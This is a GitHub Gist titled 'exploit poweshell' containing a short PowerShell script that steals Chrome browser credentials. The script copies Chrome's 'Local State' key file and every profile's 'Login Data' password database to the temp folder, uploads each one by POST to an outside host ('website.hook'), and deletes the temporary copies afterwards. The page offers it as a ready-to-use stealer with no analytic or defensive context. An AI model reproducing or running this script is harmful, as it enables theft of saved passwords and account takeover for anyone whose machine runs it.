Created
May 29, 2025 17:05
-
-
Save robyfirnandoyusuf/639a1425f017b5be7f8e32efbab8090d to your computer and use it in GitHub Desktop.
exploit poweshell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $profiles = Get-ChildItem "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data" | Where-Object { $_.Name -like "Profile *" } | |
| $localStatePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Local State" | |
| $tmpLocalState = "$env:TEMP\local_state" | |
| Copy-Item -Path $localStatePath -Destination $tmpLocalState -ErrorAction SilentlyContinue | |
| if (Test-Path $tmpLocalState) { | |
| Invoke-WebRequest -Uri "https://website.hook?name=local_state" -Method Post -InFile $tmpLocalState -ContentType "application/octet-stream" | |
| Remove-Item $tmpLocalState -Force -ErrorAction SilentlyContinue | |
| } | |
| foreach ($profile in $profiles) { | |
| $p = $profile.Name | |
| $safeName = ($p -replace '\s+', '_').ToLower() | |
| $f = Join-Path $profile.FullName "Login Data" | |
| if (Test-Path $f) { | |
| $tmp = "$env:TEMP\$safeName-logindata" | |
| Copy-Item -Path $f -Destination $tmp -ErrorAction SilentlyContinue | |
| if (Test-Path $tmp) { | |
| Invoke-WebRequest -Uri "https://website.hook?name=$safeName" -Method Post -InFile $tmp -ContentType "application/octet-stream" | |
| Remove-Item $tmp -Force -ErrorAction SilentlyContinue | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment